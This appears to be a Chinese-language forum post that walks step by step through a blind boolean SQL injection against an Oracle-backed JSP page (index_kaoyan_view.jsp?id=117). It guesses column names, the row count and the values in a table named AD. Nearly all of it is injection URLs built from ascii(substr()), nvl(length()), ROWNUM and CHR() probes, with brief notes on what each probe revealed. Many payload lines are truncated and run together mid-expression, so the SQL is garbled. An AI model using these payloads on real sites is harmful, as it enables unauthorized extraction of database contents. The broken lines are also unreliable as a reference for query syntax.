[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM
以下为猜解第一列第一个字段的第三位为:A
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM
以下为猜解第二列:
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM
第一个记录的第一位值为:
4、 猜解数据值:
数据值长度为一位:1
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0=nvl(length((SELECT COUNT(*)FROM AD)),0)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0=nvl(length((SELECT COUNT(*)FROM AD)),0)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0>nvl(length((SELECT COUNT(*)FROM AD)),0)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 1=nvl(length((SELECT COUNT(*)FROM AD)),0)
数据长度为:9条记录
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52=ascii(substr((SELECT COUNT(*)FROM AD),1,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52>ascii(substr((SELECT COUNT(*)FROM AD),1,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 55=ascii(substr((SELECT COUNT(*)FROM AD),1,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 55>ascii(substr((SELECT COUNT(*)FROM AD),1,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 56=ascii(substr((SELECT COUNT(*)FROM AD),1,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 56>ascii(substr((SELECT COUNT(*)FROM AD),1,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 57=ascii(substr((SELECT COUNT(*)FROM AD),1,1))
以下猜解记录值
第一行第一列记录的长度为:1,值为:1
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMnvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMhttp://www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 49=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
第一行第一列记录的长度为:1,值为:2
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMnvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 1=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 49=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
第二行第一列记录的长度为:1,值为:2
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMnvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMhttp://www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 50=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
第二行第二列记录的长度为:1,值为:2
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMnvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 1=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 50=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
猜解第三个记录的长度为:(其它记录依次类推)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMnvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
页:
[1]